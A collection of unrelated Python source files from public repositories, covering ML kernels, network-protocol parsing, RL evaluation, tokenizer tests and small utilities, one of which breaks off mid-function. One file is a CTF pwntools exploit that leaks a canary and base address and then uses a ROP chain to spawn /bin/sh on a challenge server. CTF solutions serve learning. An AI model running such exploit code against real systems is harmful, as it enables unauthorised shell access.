th = 6.283185307179586 * u2
r = tl.sqrt(-2.0 * tl.log(u1))
return r * tl.cos(th), r * tl.sin(th)
@triton.jit
def randn(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
i1, i2, _, _ = randint4x(seed, offset, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
n1, _ = pair_uniform_to_normal(u1, u2)
return n1
@triton.jit
def randn4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a 4 blocks of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
u1, u2, u3, u4 = rand4x(seed, offset, n_rounds)
n1, n2 = pair_uniform_to_normal(u1, u2)
n3, n4 = pair_uniform_to_normal(u3, u4)
return n1, n2, n3, n4
|
__scraping__/myaccount.umn.edu/main.py
|
whitmans-max/python-examples
| 140 |
117543
|
<reponame>whitmans-max/python-examples
#!/usr/bin/env python3
# date: 2020.02.26
# https://stackoverflow.com/questions/60406035/how-to-scrape-the-details-from-a-website-based-on-the-details-in-spread-sheet
# https://pastebin.com/evjdtpuA
# https://pastebin.com/J1UaYVzt
import selenium.webdriver
def scrape1(name):
url = 'https://myaccount.umn.edu/lookup?SET_INSTITUTION=UMNTC&type=name&campus=a&role=any&CN='
driver = selenium.webdriver.Firefox()
driver.get(url)
driver.find_element_by_xpath('//input[@name="CN"]').send_keys(name)
driver.find_element_by_xpath('//input[@type="submit"]').click()
items = driver.find_elements_by_xpath('//table[@class="result__single-person"]//a')
for item in items:
print(item.text)
def scrape2(name):
url = 'https://myaccount.umn.edu/lookup?SET_INSTITUTION=UMNTC&type=name&campus=a&role=any&CN='
driver = selenium.webdriver.Firefox()
driver.get(url + name.replace(' ', '+'))
items = driver.find_elements_by_xpath('//table[@class="result__single-person"]//a')
for item in items:
print(item.text)
# --- main ---
scrape1("<NAME>")
scrape2("<NAME>")
|
TimeWrapper_JE/venv/Lib/site-packages/setuptools/_distutils/debug.py
|
JE-Chen/je_old_repo
| 207 |
117552
|
<gh_stars>100-1000
import os
# If DISTUTILS_DEBUG is anything other than the empty string, we run in
# debug mode.
DEBUG = os.environ.get('DISTUTILS_DEBUG')
|
src/data/orthofoto/tile_loader.py
|
grischard/OSMDeepOD
| 156 |
117555
|
from src.base.tile import Tile
class TileLoader:
def __init__(self, bbox=None, image_api=None):
self.bbox = bbox
self.image_api = image_api
self.tile = None
def load_tile(self):
image = self.image_api.get_image(self.bbox)
self.tile = Tile(image, self.bbox)
return self.tile
|
deeppy/expr/nnet/spatial.py
|
purushothamgowthu/deeppy
| 1,170 |
117593
|
<reponame>purushothamgowthu/deeppy
import cudarray as ca
from ...base import ParamMixin
from ...parameter import Parameter
from ..base import Unary
def padding(win_shape, border_mode):
if border_mode == 'valid':
def pad_fun(win_size): return 0
elif border_mode == 'same':
def pad_fun(win_size): return win_size // 2
elif border_mode == 'full':
def pad_fun(win_size): return win_size - 1
else:
raise ValueError('invalid mode: "%s"' % border_mode)
return tuple(pad_fun(win_size) for win_size in win_shape)
class Convolution(Unary, ParamMixin):
def __init__(self, n_filters, filter_shape, weights, bias=0.0,
strides=(1, 1), border_mode='valid'):
self.name = 'conv'
self.n_filters = n_filters
self.filter_shape = filter_shape
self.weights = Parameter.from_any(weights)
if bias is not None:
bias = Parameter.from_any(bias)
self.bias = bias
self.padding = padding(filter_shape, border_mode)
self.strides = strides
self.conv_op = ca.nnet.ConvBC01(self.padding, self.strides)
def __call__(self, x):
super(Convolution, self).__call__(x)
self.bpropable = True
return self
@staticmethod
def img_out_shape(img_shape, win_shape, strides, padding):
return tuple((img_size + 2*pad - win_size) // stride + 1
for img_size, win_size, stride, pad
in zip(img_shape, win_shape, strides, padding))
def setup(self):
x_shape = self.x.shape
batch_size, n_channels = x_shape[:2]
self.weights.setup((self.n_filters, n_channels) + self.filter_shape)
if self.bias is not None:
self.bias.setup((1, self.n_filters, 1, 1))
img_shape = self.img_out_shape(x_shape[2:], self.filter_shape,
self.strides, self.padding)
self.shape = (batch_size, self.n_filters) + img_shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
self.conv_op.fprop(self.x.array, self.weights.array,
convout=self.array)
if self.bias is not None:
self.array += self.bias.array
def bprop(self):
self.conv_op.bprop(
self.x.array, self.weights.array, self.grad_array,
filters_d=self.weights.grad_array, imgs_d=self.x.grad_array
)
if self.bias is not None:
ca.sum(ca.sum(self.grad_array, axis=(2, 3), keepdims=True), axis=0,
keepdims=True, out=self.bias.grad_array)
@property
def params(self):
if self.bias is None:
return self.weights,
else:
return self.weights, self.bias
@params.setter
def params(self, params):
if self.bias is None:
self.weights, = params
else:
self.weights, self.bias = params
class BackwardConvolution(Convolution):
def __init__(self, n_filters, filter_shape, weights, bias=0.0,
strides=(2, 2), border_mode='valid'):
super(BackwardConvolution, self).__init__(
n_filters, filter_shape, weights, bias, strides, border_mode
)
self.conv_op = ca.nnet.ConvBC01(self.padding, self.strides)
@staticmethod
def img_out_shape(img_shape, win_shape, strides, padding):
return tuple((img_size + 2*pad - win_size + 1) * stride
for img_size, win_size, stride, pad
in zip(img_shape, win_shape, strides, padding))
def setup(self):
x_shape = self.x.shape
batch_size, n_channels = x_shape[:2]
self.weights.setup((n_channels, self.n_filters) + self.filter_shape)
if self.bias is not None:
self.bias.setup((1, self.n_filters, 1, 1))
img_shape = self.img_out_shape(x_shape[2:], self.filter_shape,
self.strides, self.padding)
self.shape = (batch_size, self.n_filters) + img_shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
# make sure conv_op is initialized
self.conv_op.fprop(self.grad_array, self.weights.array,
convout=self.x.grad_array)
def fprop(self):
self.conv_op.bprop(
None, self.weights.array, self.x.array,
to_filters=False, imgs_d=self.array
)
if self.bias is not None:
self.array += self.bias.array
def bprop(self):
self.conv_op.bprop(
self.grad_array, self.weights.array, self.x.array,
filters_d=self.weights.grad_array, to_imgs=False
)
self.conv_op.fprop(self.grad_array, self.weights.array,
convout=self.x.grad_array)
if self.bias is not None:
ca.sum(ca.sum(self.grad_array, axis=(2, 3), keepdims=True), axis=0,
keepdims=True, out=self.bias.grad_array)
class Pool(Unary):
def __init__(self, win_shape=(3, 3), method='max', strides=(2, 2),
border_mode='valid'):
pad = padding(win_shape, border_mode)
self.pool_op = ca.nnet.PoolB01(win_shape, pad, strides, method)
self.img_shape = None
def setup(self):
self.shape = self.pool_op.fprop(self.x.array).shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
self.pool_op.fprop(self.x.array, self.array)
def bprop(self):
self.pool_op.bprop(self.x.shape[2:], self.grad_array,
self.x.grad_array)
class Rescale(Unary):
def __init__(self, factor, method):
self.factor = factor
self.method = method
def setup(self):
self.shape = ca.nnet.rescale(self.x.array, self.factor,
self.method).shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
ca.nnet.rescale(self.x.array, self.factor, self.method, self.array)
if self.factor > 1.0 and self.method != 'perforated':
self.array *= 1.0/(self.factor*self.factor)
def bprop(self):
ca.nnet.rescale(self.grad_array, 1./self.factor, self.method,
self.x.grad_array)
|
notebooks/test.py
|
vishalbelsare/LocalGraphClustering
| 106 |
117597
|
<gh_stars>100-1000
from localgraphclustering import *
import time
import numpy as np
# Read graph. This also supports gml and graphml format.
g = GraphLocal('./datasets/senate.edgelist','edgelist',' ')
# Call the global spectral partitioning algorithm.
eig2 = fiedler(g)
# Round the eigenvector
output_sc = sweep_cut(g,eig2)
# Extract the partition for g and store it.
eig2_rounded = output_sc[0]
# Conductance before improvement
print("Conductance before improvement:",g.compute_conductance(eig2_rounded))
# Start calling SimpleLocal
start = time.time()
output_SL_fast = SimpleLocal(g,eig2_rounded)
end = time.time()
print("running time:",str(end-start)+"s")
# Conductance after improvement
print("Conductance after improvement:",g.compute_conductance(output_SL_fast[0]))
output_SL = output_SL_fast[0]
|
models/methods/SwinTrack/modules/encoder/cross_attention_fusion/builder.py
|
zhangzhengde0225/SwinTrack
| 143 |
117600
|
<reponame>zhangzhengde0225/SwinTrack
from .cross_attention_fusion import FeatureFusion, FeatureFusionEncoder
from ....positional_encoding.untied.absolute import Untied2DPositionalEncoder
from ....positional_encoding.untied.relative import generate_2d_relative_positional_encoding_index, \
RelativePosition2DEncoder
def build_cross_attention_based_encoder(config: dict, drop_path_allocator,
dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,
z_shape, x_shape):
transformer_config = config['transformer']
assert transformer_config['position_embedding']['enabled'] == False and \
transformer_config['untied_position_embedding']['absolute']['enabled'] == True and \
transformer_config['untied_position_embedding']['relative']['enabled'] == True
encoder_config = transformer_config['encoder']
assert encoder_config['type'] == 'cross_attention_feature_fusion'
num_layers = encoder_config['num_layers']
encoder_layers = []
for index_of_layer in range(num_layers):
encoder_layers.append(
FeatureFusion(dim, num_heads, mlp_ratio, qkv_bias, drop=drop_rate, attn_drop=attn_drop_rate,
drop_path=drop_path_allocator.allocate(),
attn_pos_encoding_only=True)
)
z_abs_encoder = Untied2DPositionalEncoder(dim, num_heads, z_shape[0], z_shape[1])
x_abs_encoder = Untied2DPositionalEncoder(dim, num_heads, x_shape[0], x_shape[1])
z_self_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(z_shape, z_shape)
x_self_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(x_shape, x_shape)
z_x_cross_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(z_shape, x_shape)
x_z_cross_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(x_shape, z_shape)
z_self_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, z_self_attn_rel_pos_index.max() + 1)
x_self_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, x_self_attn_rel_pos_index.max() + 1)
z_x_cross_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, z_x_cross_attn_rel_pos_index.max() + 1)
x_z_cross_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, x_z_cross_attn_rel_pos_index.max() + 1)
return FeatureFusionEncoder(encoder_layers, z_abs_encoder, x_abs_encoder, z_self_attn_rel_pos_index,
x_self_attn_rel_pos_index,
z_x_cross_attn_rel_pos_index, x_z_cross_attn_rel_pos_index,
z_self_attn_rel_pos_bias_table,
x_self_attn_rel_pos_bias_table, z_x_cross_attn_rel_pos_bias_table,
x_z_cross_attn_rel_pos_bias_table)
|
examples/http/http_players.py
|
timgates42/netius
| 107 |
117607
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Netius System
# Copyright (c) 2008-2020 Hive Solutions Lda.
#
# This file is part of Hive Netius System.
#
# Hive Netius System is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Netius System is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Netius System. If not, see <http://www.apache.org/licenses/>.
__author__ = "<NAME> <<EMAIL>>"
""" The author(s) of the module """
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2020 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
import os
import asyncio
import aiofiles
import aiohttp
import netius
BASE_URL = "http://stats.nba.com/stats"
HEADERS = {
"user-agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/45.0.2454.101 Safari/537.36"
),
"connection": ("keep-alive")
}
async def get_players(player_args, season = "2016-17"):
endpoint = "/commonallplayers"
params = dict(
season = season,
leagueid = "00",
isonlycurrentseason = "1"
)
url = BASE_URL + endpoint
print("Getting all players for season %s ..." % season)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers = HEADERS, params = params) as resp:
data = await resp.json()
player_args.extend(
[(item[0], item[2]) for item in data["resultSets"][0]["rowSet"]])
async def get_player(player_id, player_name):
endpoint = "/commonplayerinfo"
params = dict(playerid = player_id)
url = BASE_URL + endpoint
print("Getting player %s" % player_name)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers = HEADERS, params = params) as resp:
data = await resp.text()
print(data)
async with aiofiles.open(
"players/%s.json" % player_name.replace(" ", "_"), "w"
) as file:
await file.write(data)
loop = netius.get_loop(_compat = True)
os.makedirs("players", exist_ok = True)
player_args = []
loop.run_until_complete(get_players(player_args))
loop.run_until_complete(
asyncio.gather(
*(get_player(*args) for args in player_args)
)
)
loop.close()
|
cpgf/samples/irrlicht/02.quake3map.py
|
mousepawmedia/libdeps
| 187 |
117619
|
def start() :
driverType = irr.driverChoiceConsole();
if driverType == irr.EDT_COUNT :
return 1;
device = irr.createDevice(driverType, irr.dimension2d_u32(640, 480));
if device == None :
return 1;
driver = device.getVideoDriver();
smgr = device.getSceneManager();
device.getFileSystem().addZipFileArchive("../../media/map-20kdm2.pk3");
mesh = smgr.getMesh("20kdm2.bsp");
node = None;
if mesh != None :
node = smgr.addOctreeSceneNode(mesh.getMesh(0), None, -1, 1024);
if node != None :
node.setPosition(irr.vector3df(-1300,-144,-1249));
smgr.addCameraSceneNodeFPS();
device.getCursorControl().setVisible(False);
lastFPS = -1;
while device.run() :
if device.isWindowActive() :
driver.beginScene(True, True, irr.SColor(255,200,200,200));
smgr.drawAll();
driver.endScene();
fps = driver.getFPS();
if lastFPS != fps :
tmp = "cpgf Irrlicht Python Binding Demo - Quake 3 Map example [";
tmp = tmp + driver.getName();
tmp = tmp + "] fps: ";
tmp = tmp + str(fps);
device.setWindowCaption(tmp);
lastFPS = fps;
device.drop();
return 0;
start();
|
metrics/metric_monitor.py
|
apple/ml-cvnets
| 209 |
117622
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from typing import Optional, Tuple, Any
from torch import Tensor
from utils.tensor_utils import tensor_to_python_float
from .topk_accuracy import top_k_accuracy
from .intersection_over_union import compute_miou_batch
from .psnr import compute_psnr
def metric_monitor(
opts,
pred_label: Any,
target_label: Any,
loss: Tensor or float,
metric_names: list,
use_distributed: Optional[bool] = False,
grad_norm: Optional = None,
is_evaluation: Optional[bool] = False,
*args,
**kwargs
):
metric_vals = dict()
if "loss" in metric_names:
loss = tensor_to_python_float(loss, is_distributed=use_distributed)
metric_vals["loss"] = loss
if "grad_norm" in metric_names:
if grad_norm is None:
metric_vals["grad_norm"] = 1e-7
else:
grad_norm = tensor_to_python_float(
grad_norm, is_distributed=use_distributed
)
metric_vals["grad_norm"] = grad_norm
if "top1" in metric_names:
top_1_acc, top_5_acc = top_k_accuracy(pred_label, target_label, top_k=(1, 5))
top_1_acc = tensor_to_python_float(top_1_acc, is_distributed=use_distributed)
metric_vals["top1"] = top_1_acc
if "top5" in metric_names:
top_5_acc = tensor_to_python_float(
top_5_acc, is_distributed=use_distributed
)
metric_vals["top5"] = top_5_acc
if "iou" in metric_names:
inter, union = compute_miou_batch(prediction=pred_label, target=target_label)
inter = tensor_to_python_float(inter, is_distributed=use_distributed)
union = tensor_to_python_float(union, is_distributed=use_distributed)
metric_vals["iou"] = {"inter": inter, "union": union}
if "psnr" in metric_names:
psnr = compute_psnr(prediction=pred_label, target=target_label)
metric_vals["psnr"] = tensor_to_python_float(
psnr, is_distributed=use_distributed
)
return metric_vals
|
sendWhatsappMessage.py
|
systemquant/DeFi_PanCakeSwapBot
| 142 |
117627
|
import pywhatkit as py
import keyboard
import time
from datetime import datetime
def sendMessage(numbers, message, price):
for number in numbers:
py.sendwhatmsg(number, "{}: {:.10f}".format(message, price), datetime.now().hour,
datetime.now().minute + 2)
keyboard.press_and_release('ctrl+w')
time.sleep(1)
keyboard.press_and_release('enter')
time.sleep(1)
|
tests/test_tokenization.py
|
jayten42/pororo
| 1,137 |
117633
|
"""Test Tokenization module"""
import unittest
from pororo import Pororo
class PororoTokenizerTester(unittest.TestCase):
def test_modules(self):
mecab = Pororo(task="tokenize", lang="ko", model="mecab_ko")
mecab_res = mecab("안녕 나는 민이라고 해.")
self.assertIsInstance(mecab_res, list)
bpe = Pororo(task="tokenise", lang="ko", model="bpe32k.ko")
bpe_res = bpe("안녕 나는 민이라고 해.")
self.assertIsInstance(bpe_res, list)
unigram = Pororo(task="tokenization", lang="ko", model="unigram32k.ko")
unigram_res = unigram("안녕 나는 민이라고 해.")
self.assertIsInstance(unigram_res, list)
char = Pororo(task="tokenization", lang="ko", model="char")
char_res = char("안녕 나는 민이라고 해.")
self.assertIsInstance(char_res, list)
jamo = Pororo(task="tokenization", lang="ko", model="jamo")
jamo_res = jamo("안녕 나는 민이라고 해.")
self.assertIsInstance(jamo_res, list)
jpe = Pororo(task="tokenization", lang="ko", model="jpe32k.ko")
jpe_res = jpe("안녕 나는 민이라고 해.")
self.assertIsInstance(jpe_res, list)
mecab_bpe = Pororo(
task="tokenization",
lang="ko",
model="mecab.bpe32k.ko",
)
mecab_bpe_res = mecab_bpe("안녕 나는 민이라고 해.")
self.assertIsInstance(mecab_bpe_res, list)
if __name__ == "__main__":
unittest.main()
|
examples/rl/train/evaluation.py
|
ONLYA/RoboGrammar
| 156 |
117655
|
import numpy as np
import torch
import time
import gym
from a2c_ppo_acktr import utils
from a2c_ppo_acktr.envs import make_vec_envs
from common.common import *
import pyrobotdesign as rd
def evaluate(args, actor_critic, ob_rms, env_name, seed, num_processes, device):
eval_envs = make_vec_envs(env_name, seed + num_processes, num_processes,
None, None, device, True)
vec_norm = utils.get_vec_normalize(eval_envs)
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
eval_episode_rewards = []
obs = eval_envs.reset()
eval_recurrent_hidden_states = torch.zeros(
num_processes, actor_critic.recurrent_hidden_state_size, device=device)
eval_masks = torch.zeros(num_processes, 1, device=device)
while len(eval_episode_rewards) < args.eval_num:
with torch.no_grad():
_, action, _, eval_recurrent_hidden_states = actor_critic.act(
obs,
eval_recurrent_hidden_states,
eval_masks,
deterministic=True)
# Obser reward and next obs
obs, _, done, infos = eval_envs.step(action)
eval_masks = torch.tensor(
[[0.0] if done_ else [1.0] for done_ in done],
dtype=torch.float64,
device=device)
for info in infos:
if 'episode' in info.keys():
eval_episode_rewards.append(info['episode']['r'])
eval_envs.close()
print(" Evaluation using {} episodes: mean reward {:.5f}\n".format(
len(eval_episode_rewards), np.mean(eval_episode_rewards)))
def render(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step * render_env.frame_skip
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while not done:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 5.0 * time_step * (target_pos - camera_pos)
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
# render each sub-step
def render_full(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step
control_frequency = render_env.frame_skip
render_env.set_frame_skip(1)
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while episode_length < 128 * control_frequency:
if episode_length % control_frequency == 0:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 20.0 * time_step * (target_pos - camera_pos)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
if sim_time + time_step > render_time_now - render_time_start:
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
|
tracardi/domain/settings.py
|
bytepl/tracardi
| 153 |
117660
|
from typing import Any
from pydantic import BaseModel
from tracardi.domain.enum.yes_no import YesNo
class Settings(BaseModel):
enabled: bool = True
hidden: bool = False
@staticmethod
def as_bool(state: YesNo):
return state.value == state.yes
class SystemSettings(BaseModel):
label: str
value: Any
desc: str
|
maml/apps/symbolic/tests/__init__.py
|
anooptp/maml
| 161 |
117666
|
<reponame>anooptp/maml
"""
Tests for symbolic package.
"""
|
metakernel/magics/get_magic.py
|
StephanRempel/metakernel
| 276 |
117673
|
# Copyright (c) Metakernel Development Team.
# Distributed under the terms of the Modified BSD License.
from metakernel import Magic
class GetMagic(Magic):
def line_get(self, variable):
"""
%get VARIABLE - get a variable from the kernel in a Python-type.
This line magic is used to get a variable.
Examples:
%get x
"""
self.retval = self.kernel.get_variable(variable)
def post_process(self, retval):
return self.retval
def register_magics(kernel):
kernel.register_magics(GetMagic)
|
data_structures/bst/bt_to_bst.py
|
Inquis1t0r/python-ds
| 1,723 |
117687
|
<filename>data_structures/bst/bt_to_bst.py<gh_stars>1000+
class Node:
def __init__(self, val):
self.val = val
self.left = None
self.right = None
def store_inorder(root, inorder):
if root is None:
return
store_inorder(root.left, inorder)
inorder.append(root.data)
store_inorder(root.right, inorder)
def count_nodes(root):
if root is None:
return 0
return count_nodes(root.left) + count_nodes(root.right) + 1
def array_to_bst(arr, root):
if root is None:
return
array_to_bst(arr, root.left)
root.data = arr[0]
arr.pop(0)
array_to_bst(arr, root.right)
def bt_to_bst(root):
if root is None:
return
n = count_nodes(root)
arr = []
store_inorder(root, arr)
arr.sort()
array_to_bst(arr, root)
|
yabgp/message/attribute/largecommunity.py
|
mengjunyi/yabgp
| 203 |
117734
|
<filename>yabgp/message/attribute/largecommunity.py
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import struct
from yabgp.message.attribute import Attribute
from yabgp.message.attribute import AttributeID
from yabgp.message.attribute import AttributeFlag
from yabgp.common import exception as excep
from yabgp.common import constants as bgp_cons
class LargeCommunity(Attribute):
"""
LARGE COMMUNITIES path attribute is an optional
transitive attribute of variable length. The attribute consists of a
set of 12 octet values, each of which specify a community. All
routes with this attribute belong to the communities listed in the
attribute.
The LARGE COMMUNITIES attribute has Type Code 32.
https://tools.ietf.org/html/rfc8092#page-3
"""
ID = AttributeID.LARGE_COMMUNITY
FLAG = AttributeFlag.OPTIONAL + AttributeFlag.TRANSITIVE + AttributeFlag.PARTIAL
@classmethod
def parse(cls, value):
"""
parse BGP large community.
:param value:
"""
large_community = []
if value:
try:
length = len(value) / 4
value_list = list(struct.unpack('!%di' % length, value))
while value_list:
large_community.append("%s:%s:%s" % (value_list[0], value_list[1], value_list[2]))
value_list = value_list[3:]
except Exception:
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_ATTR_LEN,
data=value)
return large_community
@classmethod
def construct(cls, value):
"""
construct a LARGE COMMUNITY path attribute
:param value:
"""
large_community_hex = b''
for large_community in value:
try:
value = large_community.split(':')
for sub_value in value:
large_community_hex += struct.pack('!I', int(sub_value))
except Exception:
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_ATTR_LEN,
data=value
)
return struct.pack('!B', cls.FLAG) + struct.pack('!B', cls.ID) \
+ struct.pack('!B', len(large_community_hex)) + large_community_hex
|
test/python/importer/jit_ir/node_import/utils.py
|
burntfalafel/torch-mlir-internal
| 213 |
117743
|
# -*- Python -*-
# This file is licensed under a pytorch-style license
# See LICENSE.pytorch for license information.
# Helpers for the other tests.
import torch
from torch._C import CompilationUnit
# RUN: %PYTHON %s
# Import TorchScript IR string as ScriptFunction.
def create_script_function(func_name, ts_ir_str):
cu = CompilationUnit()
return cu.create_function(func_name, torch._C.parse_ir(ts_ir_str))
|
openff/toolkit/utils/__init__.py
|
ijpulidos/openff-toolkit
| 120 |
117752
|
<gh_stars>100-1000
# General utilities for force fields
from openff.toolkit.utils.utils import * # isort:skip
from openff.toolkit.utils.toolkits import *
|
b01lersbootcampctf2020/goodbye_mr_anderson/exploit.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
117766
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./leaks')
context.log_level = 'INFO'
if not args.REMOTE:
context.log_file = 'local.log'
p = process(binary.path)
else:
context.log_file = 'remote.log'
p = remote('chal.ctf.b01lers.com', 1009)
p.recvuntil('goodbye, Mr. Anderson.\n')
# binsh as name
p.sendline('8')
p.sendline('/bin/sh\0')
# leak base address
p.sendline('8')
p.sendline(8 * 'A')
p.recvline()
_ = p.recv(5)
_start = u64(b'\0' + _ + b'\0\0')
log.info('_start: ' + hex(_start))
binary.address = _start - binary.sym._start
log.info('binary.address: ' + hex(binary.address))
log.info('name ' + hex(binary.sym.name))
# leak canary
p.sendline('24')
p.sendline(24 * 'A')
p.recvline()
p.recvline()
_ = p.recv(7)
canary = u64(b'\0' + _)
log.info('canary: ' + hex(canary))
# get a shell
rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
pop_rsi_r15 = rop.find_gadget(['pop rsi','pop r15','ret'])[0]
payload = 24 * b'A'
payload += p64(canary)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(binary.sym.name)
payload += p64(pop_rsi_r15)
payload += p64(0)
payload += p64(0)
payload += p64(binary.sym.yay)
p.sendline(str(len(payload)))
p.sendline(payload)
p.recvline()
p.recvline()
p.interactive()
|
utils/misc.py
|
niqbal996/ViewAL
| 126 |
117772
|
<gh_stars>100-1000
import numpy as np
from utils.colormaps import map_segmentation_to_colors
import constants
import os
import torch
def get_learning_rate(optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
def visualize_point_cloud(world_coordinates):
import open3d as o3d
xyz = np.transpose(world_coordinates)[:, :3]
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
o3d.visualization.draw_geometries([pcd])
def turn_on_dropout(model):
if type(model) == torch.nn.Dropout2d:
model.train()
def visualize_entropy(image_normalized, entropy_map, prediction=None, ground_truth=None, valid_mask=None, weight_map=None, save=False, suffix='ent'):
import matplotlib
import matplotlib.pyplot as plt
from imageio import imwrite
if not image_normalized is None:
image_unnormalized = ((np.transpose(image_normalized, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
#norm = matplotlib.colors.Normalize(vmin=0, vmax=np.max(entropy_map), clip=False)
norm_ent = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_entropy, clip=False)
norm_weight = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_weight, clip=False)
plt.figure()
num_subplots = 2
if not prediction is None:
num_subplots += 1
if not ground_truth is None:
num_subplots += 1
if not valid_mask is None:
num_subplots += 1
if not weight_map is None:
num_subplots += 1
cur_subplot = 1
plt.title('display')
if not image_normalized is None:
plt.subplot(1, num_subplots, cur_subplot)
plt.imshow(image_unnormalized)
